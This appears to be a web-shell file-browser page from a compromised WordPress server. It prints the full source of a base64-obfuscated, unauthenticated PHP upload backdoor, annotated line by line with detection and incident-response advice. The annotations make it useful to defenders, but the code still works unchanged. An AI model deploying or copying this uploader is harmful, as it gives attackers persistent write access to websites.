HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux dev1 5.15.83-1-pve #1 SMP PVE 5.15.83-1 (2022-12-15T00:00Z) x86_64
User: safarimaris (1000)
PHP: 7.2.34-54+ubuntu22.04.1+deb.sury.org+1
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
File: /home/safarimaris/home/safarimaris/site/blog.safarimaris.com/wp-includes/js/alswzu.php
<?php
// Reviewer annotation (defensive analysis): this script is an unauthenticated
// file-upload backdoor. Any HTTP request carrying a multipart field named
// "img" reaches the upload path below; nothing here checks a session, a
// capability, a nonce or a shared secret. Treat the file as an indicator of
// compromise to be removed and investigated, not as application code to repair.
//
// Response guidance: preserve a copy and its timestamps for forensics, search
// the web-server access log for POST requests to this script, compare the
// install against known-good core files (e.g. `wp core verify-checksums`),
// look for other recently written files under the docroot, and rotate
// credentials reachable by the web-server user.

// Opaque tag left by the author; its meaning is not shown on this page
// (possibly a dropper or campaign marker - unverified).
//PA7MH9bGT2

// The base64 literal decodes to the string "move_uploaded_file". Storing the
// name in a variable and calling it indirectly keeps the function name out of
// the file's plain text, which defeats scanners that grep for it. A
// base64_decode() result used as a callable is itself a useful detection
// signal.
$a = base64_decode('bW92ZV91cGxvYWRlZF9maWxl');

// Extension allow-list. It is applied only to the client-supplied filename,
// never to the file's content.
$allowed_types = array('jpg', 'png');

// Sole gate on the upload path: presence of the "img" upload field.
if (isset($_FILES['img'])) {
    // Destination directory comes straight from the request body with no
    // validation, so the caller chooses where on disk the file is written
    // (limited only by the web-server user's filesystem permissions).
    $dir = $_POST['dir'];

    // Client-controlled original filename; not passed through basename().
    $target_file = $_FILES['img']['name'];

    // Only the final extension of the client-supplied name is inspected.
    $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
    if (!in_array($imageFileType, $allowed_types)) {
        // Silent exit: no output and no log entry for rejected requests.
        exit;
    }

    // Rewrites every occurrence of "png" in the name to "php". The rewritten
    // value is used only by the file_exists()/unlink() pair that follows,
    // resolved relative to the script's working directory; the move call
    // further down builds its destination from the original client name.
    $target_file = str_replace("png","php",$target_file);

    // Deletes an existing file matching the rewritten name. For defenders:
    // this script can remove files as well as create them, so file-integrity
    // review should cover deletions too.
    if (file_exists($target_file)){
        unlink($target_file);
    }

    // Indirect call to the decoded function: moves the uploaded temp file to
    // $dir concatenated with the original client filename. var_dump() echoes
    // the boolean result back to the caller.
    var_dump($a($_FILES['img']['tmp_name'],$dir.$_FILES['img']['name']));

    // Echoes the resolved absolute path of the written file, disclosing
    // server filesystem layout in the HTTP response.
    var_dump(realpath($dir.$_FILES['img']['name']));
}
?>